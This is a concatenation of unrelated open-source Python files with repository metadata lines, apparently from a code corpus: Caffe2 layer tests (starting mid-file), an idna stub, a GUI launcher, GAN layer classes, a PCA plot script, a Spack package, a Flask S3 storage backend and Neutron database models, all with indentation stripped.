self.assertEqual(input_record.metadata.expected_value, 99)
self.assertEqual(
input_record.metadata.feature_specs.feature_ids,
[1, 100, 1001]
)
@given(
X=hu.arrays(dims=[5, 5]), # Shape of X is irrelevant
)
def testDropout(self, X):
input_record = self.new_record(schema.Scalar((np.float32, (1,))))
schema.FeedRecord(input_record, [X])
d_output = self.model.Dropout(input_record)
self.assertEqual(schema.Scalar((np.float32, (1,))), d_output)
self.model.output_schema = schema.Struct()
train_init_net, train_net = self.get_training_nets()
input_blob = input_record.field_blobs()[0]
output_blob = d_output.field_blobs()[0]
train_d_spec = OpSpec(
"Dropout",
[input_blob],
[output_blob, None],
{'is_test': 0, 'ratio': 0.5}
)
test_d_spec = OpSpec(
"Dropout",
[input_blob],
[output_blob, None],
{'is_test': 1, 'ratio': 0.5}
)
self.assertNetContainOps(
train_net,
[train_d_spec]
)
eval_net = self.get_eval_net()
self.assertNetContainOps(
eval_net,
[test_d_spec]
)
predict_net = self.get_predict_net()
self.assertNetContainOps(
predict_net,
[test_d_spec]
)
workspace.RunNetOnce(train_init_net)
workspace.RunNetOnce(train_net)
schema.FeedRecord(input_record, [X])
workspace.RunNetOnce(eval_net)
schema.FeedRecord(input_record, [X])
workspace.RunNetOnce(predict_net)
@given(
num_inputs=st.integers(1, 3),
batch_size=st.integers(5, 10)
)
def testMergeIdListsLayer(self, num_inputs, batch_size):
inputs = []
for _ in range(num_inputs):
lengths = np.random.randint(5, size=batch_size).astype(np.int32)
size = lengths.sum()
values = np.random.randint(1, 10, size=size).astype(np.int64)
inputs.append(lengths)
inputs.append(values)
input_schema = schema.Tuple(
*[schema.List(
schema.Scalar(dtype=np.int64, metadata=schema.Metadata(
categorical_limit=20
))) for _ in range(num_inputs)]
)
input_record = schema.NewRecord(self.model.net, input_schema)
schema.FeedRecord(input_record, inputs)
output_schema = self.model.MergeIdLists(input_record)
assert schema.equal_schemas(
output_schema, IdList,
check_field_names=False)
@given(
batch_size=st.integers(min_value=2, max_value=10),
input_dims=st.integers(min_value=5, max_value=10),
output_dims=st.integers(min_value=5, max_value=10),
bandwidth=st.floats(min_value=0.1, max_value=5),
)
def testRandomFourierFeatures(self, batch_size, input_dims, output_dims, bandwidth):
def _rff_hypothesis_test(rff_output, X, W, b, scale):
"""
Runs hypothesis test for Semi Random Features layer.
Inputs:
rff_output -- output of net after running random fourier features layer
X -- input data
W -- weight parameter from train_init_net
b -- bias parameter from train_init_net
scale -- value by which to scale the output vector
"""
output = workspace.FetchBlob(rff_output)
output_ref = scale * np.cos(np.dot(X, np.transpose(W)) + b)
npt.assert_allclose(output, output_ref, rtol=1e-3, atol=1e-3)
X = np.random.random((batch_size, input_dims)).astype(np.float32)
scale = np.sqrt(2.0 / output_dims)
input_record = self.new_record(schema.Scalar((np.float32, (input_dims,))))
schema.FeedRecord(input_record, [X])
input_blob = input_record.field_blobs()[0]
rff_output = self.model.RandomFourierFeatures(input_record,
output_dims,
bandwidth)
self.model.output_schema = schema.Struct()
self.assertEqual(
schema.Scalar((np.float32, (output_dims, ))),
rff_output
)
train_init_net, train_net = self.get_training_nets()
# Init net assertions
init_ops_list = [
OpSpec("GaussianFill", None, None),
OpSpec("UniformFill", None, None),
]
init_ops = self._test_net(train_init_net, init_ops_list)
W = workspace.FetchBlob(self.model.layers[0].w)
b = workspace.FetchBlob(self.model.layers[0].b)
# Operation specifications
fc_spec = OpSpec("FC", [input_blob, init_ops[0].output[0],
init_ops[1].output[0]], None)
cosine_spec = OpSpec("Cos", None, None)
scale_spec = OpSpec("Scale", None, rff_output.field_blobs(),
{'scale': scale})
ops_list = [
fc_spec,
cosine_spec,
scale_spec
]
# Train net assertions
self._test_net(train_net, ops_list)
_rff_hypothesis_test(rff_output(), X, W, b, scale)
# Eval net assertions
eval_net = self.get_eval_net()
self._test_net(eval_net, ops_list)
_rff_hypothesis_test(rff_output(), X, W, b, scale)
# Predict net assertions
predict_net = self.get_predict_net()
self._test_net(predict_net, ops_list)
_rff_hypothesis_test(rff_output(), X, W, b, scale)
@given(
batch_size=st.integers(min_value=2, max_value=10),
input_dims=st.integers(min_value=5, max_value=10),
output_dims=st.integers(min_value=5, max_value=10),
s=st.integers(min_value=0, max_value=3),
scale=st.floats(min_value=0.1, max_value=5),
set_weight_as_global_constant=st.booleans()
)
def testArcCosineFeatureMap(self, batch_size, input_dims, output_dims, s, scale,
set_weight_as_global_constant):
def _arc_cosine_hypothesis_test(ac_output, X, W, b, s):
"""
Runs hypothesis test for Arc Cosine layer.
Inputs:
ac_output -- output of net after running arc cosine layer
X -- input data
W -- weight parameter from train_init_net
b -- bias parameter from train_init_net
s -- degree parameter
"""
# Get output from net
net_output = workspace.FetchBlob(ac_output)
# Computing output directly
x_rand = np.matmul(X, np.transpose(W)) + b
x_pow = np.power(x_rand, s)
if s > 0:
h_rand_features = np.piecewise(x_rand,
[x_rand <= 0, x_rand > 0],
[0, 1])
else:
h_rand_features = np.piecewise(x_rand,
[x_rand <= 0, x_rand > 0],
[0, lambda x: x / (1 + x)])
output_ref = np.multiply(x_pow, h_rand_features)
# Comparing net output and computed output
npt.assert_allclose(net_output, output_ref, rtol=1e-3, atol=1e-3)
X = np.random.normal(size=(batch_size, input_dims)).astype(np.float32)
input_record = self.new_record(schema.Scalar((np.float32, (input_dims,))))
schema.FeedRecord(input_record, [X])
input_blob = input_record.field_blobs()[0]
ac_output = self.model.ArcCosineFeatureMap(
input_record,
output_dims,
s=s,
scale=scale,
set_weight_as_global_constant=set_weight_as_global_constant
)
self.model.output_schema = schema.Struct()
self.assertEqual(
schema.Scalar((np.float32, (output_dims, ))),
ac_output
)
train_init_net, train_net = self.get_training_nets()
# Run create_init_net to initialize the global constants, and W and b
workspace.RunNetOnce(train_init_net)
workspace.RunNetOnce(self.model.create_init_net(name='init_net'))
if set_weight_as_global_constant:
W = workspace.FetchBlob(
self.model.global_constants['arc_cosine_feature_map_fixed_rand_W']
)
b = workspace.FetchBlob(
self.model.global_constants['arc_cosine_feature_map_fixed_rand_b']
)
else:
W = workspace.FetchBlob(self.model.layers[0].random_w)
b = workspace.FetchBlob(self.model.layers[0].random_b)
# Operation specifications
fc_spec = OpSpec("FC", [input_blob, None, None], None)
softsign_spec = OpSpec("Softsign", None, None)
relu_spec = OpSpec("Relu", None, None)
relu_spec_output = OpSpec("Relu", None, ac_output.field_blobs())
pow_spec = OpSpec("Pow", None, None, {'exponent': float(s - 1)})
mul_spec = OpSpec("Mul", None, ac_output.field_blobs())
if s == 0:
ops_list = [
fc_spec,
softsign_spec,
relu_spec_output,
]
elif s == 1:
ops_list = [
fc_spec,
relu_spec_output,
]
else:
ops_list = [
fc_spec,
relu_spec,
pow_spec,
mul_spec,
]
# Train net assertions
self._test_net(train_net, ops_list)
_arc_cosine_hypothesis_test(ac_output(), X, W, b, s)
# Eval net assertions
eval_net = self.get_eval_net()
self._test_net(eval_net, ops_list)
_arc_cosine_hypothesis_test(ac_output(), X, W, b, s)
# Predict net assertions
predict_net = self.get_predict_net()
self._test_net(predict_net, ops_list)
_arc_cosine_hypothesis_test(ac_output(), X, W, b, s)
@given(
batch_size=st.integers(min_value=2, max_value=10),
input_dims=st.integers(min_value=5, max_value=10),
output_dims=st.integers(min_value=5, max_value=10),
s=st.integers(min_value=0, max_value=3),
scale=st.floats(min_value=0.1, max_value=5),
set_weight_as_global_constant=st.booleans(),
use_struct_input=st.booleans(),
)
def testSemiRandomFeatures(self, batch_size, input_dims, output_dims, s, scale,
set_weight_as_global_constant, use_struct_input):
def _semi_random_hypothesis_test(srf_output, X_full, X_random, rand_w,
rand_b, s):
"""
Runs hypothesis test for Semi Random Features layer.
Inputs:
srf_output -- output of net after running semi random features layer
X_full -- full input data
X_random -- random-output input data
rand_w -- random-initialized weight parameter from train_init_net
rand_b -- random-initialized bias parameter from train_init_net
s -- degree parameter
"""
# Get output from net
net_output = workspace.FetchBlob(srf_output)
# Fetch learned parameter blobs
learned_w = workspace.FetchBlob(self.model.layers[0].learned_w)
learned_b = workspace.FetchBlob(self.model.layers[0].learned_b)
# Computing output directly
x_rand = np.matmul(X_random, np.transpose(rand_w)) + rand_b
x_learn = np.matmul(X_full, np.transpose(learned_w)) + learned_b
x_pow = np.power(x_rand, s)
if s > 0:
h_rand_features = np.piecewise(x_rand,
[x_rand <= 0, x_rand > 0],
[0, 1])
else:
h_rand_features = np.piecewise(x_rand,
[x_rand <= 0, x_rand > 0],
[0, lambda x: x / (1 + x)])
output_ref = np.multiply(np.multiply(x_pow, h_rand_features), x_learn)
# Comparing net output and computed output
npt.assert_allclose(net_output, output_ref, rtol=1e-3, atol=1e-3)
X_full = np.random.normal(size=(batch_size, input_dims)).astype(np.float32)
if use_struct_input:
X_random = np.random.normal(size=(batch_size, input_dims)).\
astype(np.float32)
input_data = [X_full, X_random]
input_record = self.new_record(schema.Struct(
('full', schema.Scalar(
(np.float32, (input_dims,))
)),
('random', schema.Scalar(
(np.float32, (input_dims,))
))
))
else:
X_random = X_full
input_data = [X_full]
input_record = self.new_record(schema.Scalar(
(np.float32, (input_dims,))
))
schema.FeedRecord(input_record, input_data)
srf_output = self.model.SemiRandomFeatures(
input_record,
output_dims,
s=s,
scale_random=scale,
scale_learned=scale,
set_weight_as_global_constant=set_weight_as_global_constant
)
self.model.output_schema = schema.Struct()
self.assertEqual(
schema.Struct(
('full', schema.Scalar(
(np.float32, (output_dims,))
)),
('random', schema.Scalar(
(np.float32, (output_dims,))
))
),
srf_output
)
init_ops_list = [
OpSpec("GaussianFill", None, None),
OpSpec("UniformFill", None, None),
OpSpec("GaussianFill", None, None),
OpSpec("UniformFill", None, None),
]
train_init_net, train_net = self.get_training_nets()
# Need to run to initialize the global constants for layer
workspace.RunNetOnce(self.model.create_init_net(name='init_net'))
if set_weight_as_global_constant:
# If weight params are global constants, they won't be in train_init_net
init_ops = self._test_net(train_init_net, init_ops_list[:2])
rand_w = workspace.FetchBlob(
self.model.global_constants['semi_random_features_fixed_rand_W']
)
rand_b = workspace.FetchBlob(
self.model.global_constants['semi_random_features_fixed_rand_b']
)
# Operation specifications
fc_random_spec = OpSpec("FC", [None, None, None], None)
fc_learned_spec = OpSpec("FC", [None, init_ops[0].output[0],
init_ops[1].output[0]], None)
else:
init_ops = self._test_net(train_init_net, init_ops_list)
rand_w = workspace.FetchBlob(self.model.layers[0].random_w)
rand_b = workspace.FetchBlob(self.model.layers[0].random_b)
# Operation specifications
fc_random_spec = OpSpec("FC", [None, init_ops[0].output[0],
init_ops[1].output[0]], None)
fc_learned_spec = OpSpec("FC", [None, init_ops[2].output[0],
init_ops[3].output[0]], None)
softsign_spec = OpSpec("Softsign", None, None)
relu_spec = OpSpec("Relu", None, None)
relu_output_spec = OpSpec("Relu", None, srf_output.random.field_blobs())
pow_spec = OpSpec("Pow", None, None, {'exponent': float(s - 1)})
mul_interim_spec = OpSpec("Mul", None, srf_output.random.field_blobs())
mul_spec = OpSpec("Mul", None, srf_output.full.field_blobs())
if s == 0:
ops_list = [
fc_learned_spec,
fc_random_spec,
softsign_spec,
relu_output_spec,
mul_spec,
]
elif s == 1:
ops_list = [
fc_learned_spec,
fc_random_spec,
relu_output_spec,
mul_spec,
]
else:
ops_list = [
fc_learned_spec,
fc_random_spec,
relu_spec,
pow_spec,
mul_interim_spec,
mul_spec,
]
# Train net assertions
self._test_net(train_net, ops_list)
_semi_random_hypothesis_test(srf_output.full(), X_full, X_random,
rand_w, rand_b, s)
# Eval net assertions
eval_net = self.get_eval_net()
self._test_net(eval_net, ops_list)
_semi_random_hypothesis_test(srf_output.full(), X_full, X_random,
rand_w, rand_b, s)
# Predict net assertions
predict_net = self.get_predict_net()
self._test_net(predict_net, ops_list)
_semi_random_hypothesis_test(srf_output.full(), X_full, X_random,
rand_w, rand_b, s)
def testConv(self):
batch_size = 50
H = 1
W = 10
C = 50
output_dims = 32
kernel_h = 1
kernel_w = 3
stride_h = 1
stride_w = 1
pad_t = 0
pad_b = 0
pad_r = None
pad_l = None
input_record = self.new_record(schema.Scalar((np.float32, (H, W, C))))
X = np.random.random((batch_size, H, W, C)).astype(np.float32)
schema.FeedRecord(input_record, [X])
conv = self.model.Conv(
input_record,
output_dims,
kernel_h=kernel_h,
kernel_w=kernel_w,
stride_h=stride_h,
stride_w=stride_w,
pad_t=pad_t,
pad_b=pad_b,
pad_r=pad_r,
pad_l=pad_l,
order='NHWC'
)
self.assertEqual(
schema.Scalar((np.float32, (output_dims,))),
conv
)
self.run_train_net_forward_only()
output_record = schema.FetchRecord(conv)
# check the number of output channels is the same as input in this example
assert output_record.field_types()[0].shape == (H, W, output_dims)
assert output_record().shape == (batch_size, H, W, output_dims)
train_init_net, train_net = self.get_training_nets()
# Init net assertions
init_ops = self.assertNetContainOps(
train_init_net,
[
OpSpec("XavierFill", None, None),
OpSpec("ConstantFill", None, None),
]
)
conv_spec = OpSpec(
"Conv",
[
input_record.field_blobs()[0],
init_ops[0].output[0],
init_ops[1].output[0],
],
conv.field_blobs()
)
# Train net assertions
self.assertNetContainOps(train_net, [conv_spec])
# Predict net assertions
predict_net = self.get_predict_net()
self.assertNetContainOps(predict_net, [conv_spec])
# Eval net assertions
eval_net = self.get_eval_net()
self.assertNetContainOps(eval_net, [conv_spec])
| pietern/caffe2 | caffe2/python/layers_test.py | Python | apache-2.0 | 48,600 |
# Emulate the bare minimum for idna for the Swarming bot.
# In practice, we do not need it, and it's very large.
# See https://pypi.org/project/idna/
from encodings import idna
class IDNAError(Exception):
# Refered to by requests/models.py
pass
class core(object):
class IDNAError(Exception):
# Refered to by urllib3/contrib/pyopenssl.py
pass
def encode(host, uts46=False): # pylint: disable=unused-argument
# Used by urllib3
return idna.ToASCII(host)
def decode(host):
# Used by cryptography/hazmat/backends/openssl/x509.py
return idna.ToUnicode(host)
| endlessm/chromium-browser | tools/swarming_client/third_party/idna/__init__.py | Python | bsd-3-clause | 585 |
# rFactorTools GUI
# Copyright (C) 2014 Ingo Ruhnke <grumbel@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import argparse
import datetime
import logging
import os
import sys
from .converter_thread import ConverterThread
from .main_window import MainWindow
from .progress_window import ProgressWindow
from .text_window import TextWindow
class Application:
def __init__(self):
self.converter_thread = None
def start_conversion(self, source_directory, target_directory, cfg):
assert self.converter_thread is None
progress_window = ProgressWindow(self, self.gui_main_window)
self.converter_thread = ConverterThread(source_directory, target_directory, cfg)
self.converter_thread.progress_cb = progress_window.request
self.converter_thread.start()
progress_window.wait_for_conversion()
self.cancel_conversion()
progress_window = None
self.converter_thread = None
def cancel_conversion(self):
if self.converter_thread is not None:
self.converter_thread.cancel()
self.converter_thread.join()
def show_text_window(self, title, text):
text_window = TextWindow(self.gui_main_window)
text_window.title(title)
text_window.set_text(text)
def main(self):
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(levelname)s: %(message)s")
handler = logging.StreamHandler(sys.stderr)
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
time_str = datetime.datetime.now().strftime("%Y-%m-%dT%H%M%S")
if not os.path.isdir("logs"):
os.mkdir("logs")
handler = logging.FileHandler("logs/rfactortools-gui-%s.log" % time_str, mode='w')
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
parser = argparse.ArgumentParser(description='rFactor to GSC2013 converter')
parser.add_argument('INPUTDIR', action='store', type=str, nargs='?',
help='directory containing the mod')
parser.add_argument('OUTPUTDIR', action='store', type=str, nargs='?',
help='directory where the conversion will be written')
parser.add_argument('-s', '--start', action='store_true',
help='start conversion instantly')
args = parser.parse_args()
self.gui_main_window = MainWindow(self)
if args.INPUTDIR is not None:
self.gui_main_window.source_directory.set(args.INPUTDIR)
if args.OUTPUTDIR is not None:
self.gui_main_window.target_directory.set(args.OUTPUTDIR)
if args.start:
self.gui_main_window.do_conversion()
self.gui_main_window.mainloop()
# EOF #
| Grumbel/rfactortools | rfactortools/gui/application.py | Python | gpl-3.0 | 3,511 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division
import tensorflow as tf
from niftynet.layer.base_layer import TrainableLayer
class GANImageBlock(TrainableLayer):
def __init__(self,
generator,
discriminator,
clip=None,
name='GAN_image_block'):
self._generator = generator
self._discriminator = discriminator
self.clip = clip
super(GANImageBlock, self).__init__(name=name)
def layer_op(self,
random_source,
training_image,
conditioning,
is_training):
shape_to_generate = training_image.shape.as_list()[1:]
fake_image = self._generator(random_source,
shape_to_generate,
conditioning,
is_training)
fake_logits = self._discriminator(fake_image,
conditioning,
is_training)
if self.clip:
with tf.name_scope('clip_real_images'):
training_image = tf.maximum(
-self.clip,
tf.minimum(self.clip, training_image))
real_logits = self._discriminator(training_image,
conditioning,
is_training)
return fake_image, real_logits, fake_logits
class BaseGenerator(TrainableLayer):
def __init__(self, name='generator', *args, **kwargs):
super(BaseGenerator, self).__init__(name=name)
class BaseDiscriminator(TrainableLayer):
def __init__(self, name='discriminator', *args, **kwargs):
super(BaseDiscriminator, self).__init__(name=name)
| NifTK/NiftyNet | niftynet/layer/gan_blocks.py | Python | apache-2.0 | 1,858 |
import matplotlib
matplotlib.use('Qt4Agg')
import numpy as np
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn import datasets
import pandas as pd
df = pd.read_csv('sms/sms.csv')
y = df.label
X = df.message
from sklearn.feature_extraction.text import TfidfVectorizer
print 'vectorizing'
vectorizer = TfidfVectorizer(max_df=0.5, min_df=3)
X = vectorizer.fit_transform(X)
print X.shape
plt.scatter(X[:, 0], X[:, 1], c=y)
plt.show()
# iris = datasets.load_iris()
# X = iris.data
# y = iris.target
pca = PCA(n_components=2)
print 'fitting pca'
X = pca.fit_transform(X.toarray())
print 'plotting'
plt.scatter(X[:, 0], X[:, 1], c=y)
plt.show() | moonbury/notebooks | github/MasteringMLWithScikit-learn/8365OS_07_Codes/pca-2d-plot.py | Python | gpl-3.0 | 677 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPacificaUploader(PythonPackage):
"""Python Pacifica Uploader Library"""
homepage = "https://github.com/pacifica/pacifica-python-uploader/"
pypi = "pacifica-uploader/pacifica-uploader-0.3.1.tar.gz"
version('0.3.1', sha256='adda18b28f01f0b1e6fbaf927fec9b8cf07c86f1b74185bed2a624e8a4597578')
depends_on('py-setuptools', type='build')
depends_on('py-setuptools-scm', type='build')
depends_on('py-requests', type=('build', 'run'))
| LLNL/spack | var/spack/repos/builtin/packages/py-pacifica-uploader/package.py | Python | lgpl-2.1 | 689 |
from hypothesis import given
from hypothesis.strategies import text
@given(text())
def test_uppercase_and_reverse_are_commutable(s):
print(repr(s))
assert s.upper()[::-1] == s[::-1].upper()
| alexwlchan/alexwlchan.net | src/_files/2021/test_for_noncommutative_strings.py | Python | mit | 200 |
import boto3
from werkzeug.utils import secure_filename
from .utils import convert_to_snake_case
from . import AbstractStorage, StorageExists, StorageNotExists, StorageNotAllowed
#Enhancement: Upload needs to have proper permissons public/private
#Enhancement: The get_existing_files method needs to handle subfolders
class S3Storage(AbstractStorage):
def __init__(self, app):
super(S3Storage, self).__init__(app)
self.bucket_name = app.config.get("FILEUPLOAD_S3_BUCKET", "flask_fileupload")
self.acl = app.config.get("FILEUPLOAD_S3_ACL", "public-read")
self.s3 = boto3.client('s3')
self.s3_res = boto3.resource('s3')
response = self.s3.list_buckets()
buckets = [bucket['Name'] for bucket in response['Buckets']]
#self.abs_img_path = '{}/{}'.format(self.s3.meta.endpoint_url, self.bucket_name)
if self.bucket_name not in buckets:
self.s3.create_bucket(Bucket=self.bucket_name)
self.bucket = self.s3_res.Bucket(self.bucket_name)
def get_existing_files(self):
return [f.key for f in self.bucket.objects.all()]
def store(self, filename, file_data):
filename = secure_filename(filename)
if self.snake_case:
filename = convert_to_snake_case(filename)
if self._exists(filename):
raise StorageExists()
if self.all_allowed or any(filename.endswith('.' + x) for x in self.allowed):
self.s3.put_object(Bucket=self.bucket_name,
Key=filename,
Body=file_data,
ACL=self.acl)
else:
raise StorageNotAllowed()
return filename
def get_base_path(self):
return '{}/{}/'.format(self.s3.meta.endpoint_url, self.bucket_name)
def delete(self, filename):
if not self._exists(filename):
raise StorageNotExists()
else:
self.s3.delete_object(Bucket=self.bucket_name,
Key=filename)
def _exists(self, filename):
objs = list(self.bucket.objects.filter(Prefix=filename))
if len(objs) > 0 and objs[0].key == filename:
return True
else:
return False
| Speedy1991/Flask-FileUpload | flask_fileupload/storage/s3storage.py | Python | mit | 2,266 |
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sa
from sqlalchemy import orm
from sqlalchemy import sql
from neutron.api.v2 import attributes as attr
from neutron.common import constants
from neutron.db import agentschedulers_db as agt
from neutron.db import model_base
from neutron.db import rbac_db_models
# NOTE(kevinbenton): these are here for external projects that expect them
# to be found in this module.
HasTenant = model_base.HasTenant
HasId = model_base.HasId
HasStatusDescription = model_base.HasStatusDescription
class IPAvailabilityRange(model_base.BASEV2):
"""Internal representation of available IPs for Neutron subnets.
Allocation - first entry from the range will be allocated.
If the first entry is equal to the last entry then this row
will be deleted.
Recycling ips involves reading the IPAllocationPool and IPAllocation tables
and inserting ranges representing available ips. This happens after the
final allocation is pulled from this table and a new ip allocation is
requested. Any contiguous ranges of available ips will be inserted as a
single range.
"""
allocation_pool_id = sa.Column(sa.String(36),
sa.ForeignKey('ipallocationpools.id',
ondelete="CASCADE"),
nullable=False,
primary_key=True)
first_ip = sa.Column(sa.String(64), nullable=False, primary_key=True)
last_ip = sa.Column(sa.String(64), nullable=False, primary_key=True)
__table_args__ = (
sa.UniqueConstraint(
first_ip, allocation_pool_id,
name='uniq_ipavailabilityranges0first_ip0allocation_pool_id'),
sa.UniqueConstraint(
last_ip, allocation_pool_id,
name='uniq_ipavailabilityranges0last_ip0allocation_pool_id'),
model_base.BASEV2.__table_args__
)
def __repr__(self):
return "%s - %s" % (self.first_ip, self.last_ip)
class IPAllocationPool(model_base.BASEV2, HasId):
"""Representation of an allocation pool in a Neutron subnet."""
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
nullable=True)
first_ip = sa.Column(sa.String(64), nullable=False)
last_ip = sa.Column(sa.String(64), nullable=False)
available_ranges = orm.relationship(IPAvailabilityRange,
backref='ipallocationpool',
lazy="select",
cascade='all, delete-orphan')
def __repr__(self):
return "%s - %s" % (self.first_ip, self.last_ip)
class IPAllocation(model_base.BASEV2):
"""Internal representation of allocated IP addresses in a Neutron subnet.
"""
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id',
ondelete="CASCADE"),
nullable=True)
ip_address = sa.Column(sa.String(64), nullable=False, primary_key=True)
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
nullable=False, primary_key=True)
network_id = sa.Column(sa.String(36), sa.ForeignKey("networks.id",
ondelete="CASCADE"),
nullable=False, primary_key=True)
class Route(object):
"""mixin of a route."""
destination = sa.Column(sa.String(64), nullable=False, primary_key=True)
nexthop = sa.Column(sa.String(64), nullable=False, primary_key=True)
class Forwarding(object):
"""mixin of a forwarding."""
outside_port = sa.Column(sa.Integer(), nullable=False, primary_key=True)
inside_addr = sa.Column(sa.String(15), nullable=False, primary_key=True)
inside_port = sa.Column(sa.Integer(), nullable=False, primary_key=True)
protocol = sa.Column(sa.String(4), nullable=False, primary_key=True)
class SubnetRoute(model_base.BASEV2, Route):
subnet_id = sa.Column(sa.String(36),
sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
primary_key=True)
class Port(model_base.HasStandardAttributes, model_base.BASEV2,
HasId, HasTenant):
"""Represents a port on a Neutron v2 network."""
name = sa.Column(sa.String(attr.NAME_MAX_LEN))
network_id = sa.Column(sa.String(36), sa.ForeignKey("networks.id"),
nullable=False)
fixed_ips = orm.relationship(IPAllocation, backref='port', lazy='joined',
cascade='all, delete-orphan')
mac_address = sa.Column(sa.String(32), nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
status = sa.Column(sa.String(16), nullable=False)
device_id = sa.Column(sa.String(attr.DEVICE_ID_MAX_LEN), nullable=False)
device_owner = sa.Column(sa.String(attr.DEVICE_OWNER_MAX_LEN),
nullable=False)
dns_name = sa.Column(sa.String(255), nullable=True)
__table_args__ = (
sa.Index(
'ix_ports_network_id_mac_address', 'network_id', 'mac_address'),
sa.Index(
'ix_ports_network_id_device_owner', 'network_id', 'device_owner'),
sa.UniqueConstraint(
network_id, mac_address,
name='uniq_ports0network_id0mac_address'),
model_base.BASEV2.__table_args__
)
def __init__(self, id=None, tenant_id=None, name=None, network_id=None,
mac_address=None, admin_state_up=None, status=None,
device_id=None, device_owner=None, fixed_ips=None,
dns_name=None, **kwargs):
super(Port, self).__init__(**kwargs)
self.id = id
self.tenant_id = tenant_id
self.name = name
self.network_id = network_id
self.mac_address = mac_address
self.admin_state_up = admin_state_up
self.device_owner = device_owner
self.device_id = device_id
self.dns_name = dns_name
# Since this is a relationship only set it if one is passed in.
if fixed_ips:
self.fixed_ips = fixed_ips
# NOTE(arosen): status must be set last as an event is triggered on!
self.status = status
class DNSNameServer(model_base.BASEV2):
"""Internal representation of a DNS nameserver."""
address = sa.Column(sa.String(128), nullable=False, primary_key=True)
subnet_id = sa.Column(sa.String(36),
sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
primary_key=True)
order = sa.Column(sa.Integer, nullable=False, server_default='0')
class Subnet(model_base.HasStandardAttributes, model_base.BASEV2,
HasId, HasTenant):
"""Represents a neutron subnet.
When a subnet is created the first and last entries will be created. These
are used for the IP allocation.
"""
name = sa.Column(sa.String(attr.NAME_MAX_LEN))
network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id'))
subnetpool_id = sa.Column(sa.String(36), index=True)
# NOTE: Explicitly specify join conditions for the relationship because
# subnetpool_id in subnet might be 'prefix_delegation' when the IPv6 Prefix
# Delegation is enabled
subnetpool = orm.relationship(
'SubnetPool', lazy='joined',
foreign_keys='Subnet.subnetpool_id',
primaryjoin='Subnet.subnetpool_id==SubnetPool.id')
ip_version = sa.Column(sa.Integer, nullable=False)
cidr = sa.Column(sa.String(64), nullable=False)
gateway_ip = sa.Column(sa.String(64))
allocation_pools = orm.relationship(IPAllocationPool,
backref='subnet',
lazy="joined",
cascade='delete')
enable_dhcp = sa.Column(sa.Boolean())
dns_nameservers = orm.relationship(DNSNameServer,
backref='subnet',
cascade='all, delete, delete-orphan',
order_by=DNSNameServer.order,
lazy='joined')
routes = orm.relationship(SubnetRoute,
backref='subnet',
cascade='all, delete, delete-orphan',
lazy='joined')
ipv6_ra_mode = sa.Column(sa.Enum(constants.IPV6_SLAAC,
constants.DHCPV6_STATEFUL,
constants.DHCPV6_STATELESS,
name='ipv6_ra_modes'), nullable=True)
ipv6_address_mode = sa.Column(sa.Enum(constants.IPV6_SLAAC,
constants.DHCPV6_STATEFUL,
constants.DHCPV6_STATELESS,
name='ipv6_address_modes'), nullable=True)
# subnets don't have their own rbac_entries, they just inherit from
# the network rbac entries
rbac_entries = orm.relationship(
rbac_db_models.NetworkRBAC, lazy='joined', uselist=True,
foreign_keys='Subnet.network_id',
primaryjoin='Subnet.network_id==NetworkRBAC.object_id')
class SubnetPoolPrefix(model_base.BASEV2):
"""Represents a neutron subnet pool prefix
"""
__tablename__ = 'subnetpoolprefixes'
cidr = sa.Column(sa.String(64), nullable=False, primary_key=True)
subnetpool_id = sa.Column(sa.String(36),
sa.ForeignKey('subnetpools.id',
ondelete='CASCADE'),
nullable=False,
primary_key=True)
class SubnetPool(model_base.HasStandardAttributes, model_base.BASEV2,
HasId, HasTenant):
"""Represents a neutron subnet pool.
"""
name = sa.Column(sa.String(attr.NAME_MAX_LEN))
ip_version = sa.Column(sa.Integer, nullable=False)
default_prefixlen = sa.Column(sa.Integer, nullable=False)
min_prefixlen = sa.Column(sa.Integer, nullable=False)
max_prefixlen = sa.Column(sa.Integer, nullable=False)
shared = sa.Column(sa.Boolean, nullable=False)
is_default = sa.Column(sa.Boolean, nullable=False,
server_default=sql.false())
default_quota = sa.Column(sa.Integer, nullable=True)
hash = sa.Column(sa.String(36), nullable=False, server_default='')
address_scope_id = sa.Column(sa.String(36), nullable=True)
prefixes = orm.relationship(SubnetPoolPrefix,
backref='subnetpools',
cascade='all, delete, delete-orphan',
lazy='joined')
class Network(model_base.HasStandardAttributes, model_base.BASEV2,
HasId, HasTenant):
"""Represents a v2 neutron network."""
name = sa.Column(sa.String(attr.NAME_MAX_LEN))
ports = orm.relationship(Port, backref='networks')
subnets = orm.relationship(
Subnet, backref=orm.backref('networks', lazy='joined'),
lazy="joined")
status = sa.Column(sa.String(16))
admin_state_up = sa.Column(sa.Boolean)
